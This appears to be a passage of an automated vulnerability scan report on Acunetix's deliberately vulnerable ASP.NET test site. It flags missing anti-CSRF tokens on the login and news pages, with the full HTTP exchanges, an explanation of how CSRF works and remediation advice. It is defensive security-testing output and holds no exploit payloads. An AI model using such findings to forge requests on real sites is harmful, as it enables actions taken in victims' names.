          No known Anti-CSRF token [anticsrf, CSRFToken, __RequestVerificationToken, csrfmiddlewaretoken, authenticity_token, OWASP_CSRFTOKEN, anoncsrf, csrf_token, _csrf, _csrfSecret, __csrf_magic, CSRF, _token, _csrf_token] was found in the following HTML form: [Form 1: "__EVENTARGUMENT" "__EVENTTARGET" "__EVENTVALIDATION" "__VIEWSTATE" "__VIEWSTATEGENERATOR" "btnLogin" "cbPersistCookie" "tbPassword" "tbUsername" ].

          Request
          Request line and header section (314 bytes)
          GET http://testaspnet.vulnweb.com/login.aspx HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:17 GMT
          Content-Length: 13269
          
          
          Response body (13269 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>login</title>
          		<meta name="vs_showGrid" content="True">
          		<meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1">
          		<meta name="CODE_LANGUAGE" Content="C#">
          		<meta name="vs_defaultClientScript" content="JavaScript">
          		<meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="frmLogin" method="post" action="login.aspx" id="frmLogin">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTIyMzk2OTgxMQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQ9jYlBlcnNpc3RDb29raWVzwbv+Q8XadeewSqHhJbH9z4dvJw==" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['frmLogin'];
          if (!theForm) {
              theForm = document.frmLogin;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="C2EE9ABB" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="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" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top" align="center">
          						<TABLE id="Table2" cellSpacing="0" cellPadding="5" border="0" align="center" class="FramedForm">
          							<TR>
          								<TD>Username:</TD>
          								<TD align="right">
          									<input name="tbUsername" type="text" id="tbUsername" class="Login" /></TD>
          							</TR>
          							<TR>
          								<TD>Password:</TD>
          								<TD align="right">
          									<input name="tbPassword" type="password" id="tbPassword" class="Login" /></TD>
          							</TR>
          							<TR>
          								<TD align="left" colSpan="2"><input name="cbPersistCookie" type="checkbox" id="cbPersistCookie" checked="checked" class="classic" />
          									Remember me
          								</TD>
          							</TR>
          							<TR>
          								<TD></TD>
          								<TD align="right">
          									<input type="submit" name="btnLogin" value="Login" id="btnLogin" /></TD>
          							</TR>
          						</TABLE>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          </TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          <form name="frmLogin" method="post" action="login.aspx" id="frmLogin">
          Solution

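          Phase: Architecture and Design

          Use a vetted library or framework that does not allow this weakness to occur or that provides constructs that make this weakness easier to avoid.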

          For example, use anti-CSRF packages such as the OWASP CSRFGuard.

          Phase: Implementation

          Ensure that your application is free of cross-site scripting issues, because most CSRF defenses can be bypassed using attacker-controlled script.

          Phase: Architecture and Design

          Generate a unique nonce for each form, place the nonce into the form, and verify the nonce upon receipt of the form. Be sure that the nonce is not predictable (CWE-330).

          Note that this can be bypassed using XSS.

          Identify especially dangerous operations. When the user performs a dangerous operation, send a separate confirmation request to ensure that the user intended to perform that operation.

          Note that this can be bypassed using XSS.

          Use the ESAPI Session Management control.

          This control includes a component for CSRF.

          Do not use the GET method for any request that triggers a state change.

          Phase: Implementation

          Check the HTTP Referer header to see if the request originated from an expected page. This could break legitimate functionality, because users or proxies may have disabled sending the Referer for privacy reasons.

        9. GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=0
          Alert tags
          Alert description

          No anti-CSRF token was found in the submitted HTML form.

          A cross-site request forgery is an attack that involves forcing a victim to send an HTTP request to a target destination without their knowledge or intent in order to perform an action as the victim. The underlying cause is application functionality using predictable URL/form actions in a repeatable way. The nature of the attack is that CSRF exploits the trust that a web site has for a user. By contrast, cross-site scripting (XSS) exploits the trust that a user has for a web site. Like XSS, CSRF attacks are not necessarily cross-site, but they can be. Cross-site request forgery is also known as CSRF, XSRF, one-click attack, session riding, confused deputy, and sea surf.

          CSRF attacks are effective in a number of situations, including:

          * The victim has an active session on the target site.

          * The victim is authenticated via HTTP auth on the target site.

          * The victim is on the same local network as the target site.

          CSRF has primarily been used to perform an action against a target site using the victim's privileges, but recent techniques have been discovered to disclose information by gaining access to the response. The risk of information disclosure is dramatically increased when the target site is vulnerable to XSS, because XSS can be used as a platform for CSRF, allowing the attack to operate within the bounds of the same-origin policy.

          Other info

          No known Anti-CSRF token [anticsrf, CSRFToken, __RequestVerificationToken, csrfmiddlewaretoken, authenticity_token, OWASP_CSRFTOKEN, anoncsrf, csrf_token, _csrf, _csrfSecret, __csrf_magic, CSRF, _token, _csrf_token] was found in the following HTML form: [Form 1: "__EVENTARGUMENT" "__EVENTTARGET" "__EVENTVALIDATION" "__VIEWSTATE" "__VIEWSTATEGENERATOR" ].

          Request
          Request line and header section (341 bytes)
          GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=0 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com/Comments.aspx?id=0
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:19 GMT
          Content-Length: 22687
          
          
          Response body (22687 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>ReadNews</title>
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="ReadNews.aspx?id=0" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="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" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="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" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>5/16/2019 12:32:30 PM</DIV>
          						<DIV id="divNewsTitle" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</DIV>
          						<DIV id="divNewsLong" class="NewsLong"><p><strong>London, UK</strong> &ndash; <strong>May 2019</strong> &ndash; Acunetix, the pioneer in automated web application security software, has announced that all versions of the <a href=https://www.acunetix.com/vulnerability-scanner/>Acunetix Vulnerability Scanner</a> now support <a href=https://www.acunetix.com/vulnerability-scanner/network-security-scanner/>network security scanning</a>. Network security scans are possible thanks to the seamless integration of Acunetix with the powerful OpenVAS security solution. Until now, network security scanning functionality was available only in Acunetix Online.</p>     <p>&ldquo;No matter the size of your business, you use multiple security measures to alleviate different types of risks. Your security strategy must always include both web security scans and network security scans. And it makes it so much easier and much more efficient if you can do the two together using a single integrated tool,&rdquo; said Nicolas Sciberras, CTO.</p>     <p>There are many advantages of running network security scans in Acunetix. Having a single integrated dashboard with both web and network vulnerabilities gives the best possible risk visibility and saves a lot of time and effort. Network scans may also benefit from other Acunetix features, such as <a href=https://www.acunetix.com/vulnerability-scanner/acunetix-integrations/>issue tracker integration</a> and <a href=https://www.acunetix.com/vulnerability-scanner/vulnerability-management-regulatory-compliance/>comprehensive reporting</a>.</p>     <p><strong>More Features in the Latest Build</strong></p>     <p>OpenVAS integration is introduced as part of the latest Acunetix version 12 build (<a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>build 12.0.190515149</a>). 
This new build also includes:</p>     <p>- Support for IPv6<br />     - Improved usage of machine resources<br />     - Added support for Selenium scripts as import files<br />     - Multiple vulnerability checks for SAP<br />     - Unauthorized access detection for Redis and Memcached<br />     - Source code disclosure for Ruby and Python</p>     <p>The new build also includes a number of updates and fixes, all of which are available for both Windows and Linux. More information can be found <a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>here</a>.</p>     <p>Get a demo of the product <a href=https://www.acunetix.com/network-security-scanner/>here</a>.</p>     <p><strong>About Acunetix</strong></p>     <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise&rsquo;s ability to comprehensively manage, prioritize, and control vulnerability threats &ndash; ordered by business criticality.</p>     <p><strong>Acunetix, the Company</strong></p>     <p>Founded in 2004 to combat the alarming rise in web application attacks, Acunetix is the market leader and a pioneer in automated web application security technology. From individual consultants to enterprises, penetration testers and security experts globally depend on Acunetix products and technologies. 
It is the tool of choice for many customers across sectors, including Government, Military, Education, Telecommunications, Banking, Finance, and E-Commerce sectors as well as many Fortune 500 companies such as the Pentagon, Harper Collins, Disney, Adobe, and many more.</p></DIV>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<a id="hlComments" href="Comments.aspx?id=0">Read user comments</a></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          						<center>
          						<iframe id="adsFrame" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe>
          						</center>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          <form name="Form1" method="post" action="ReadNews.aspx?id=0" id="Form1">
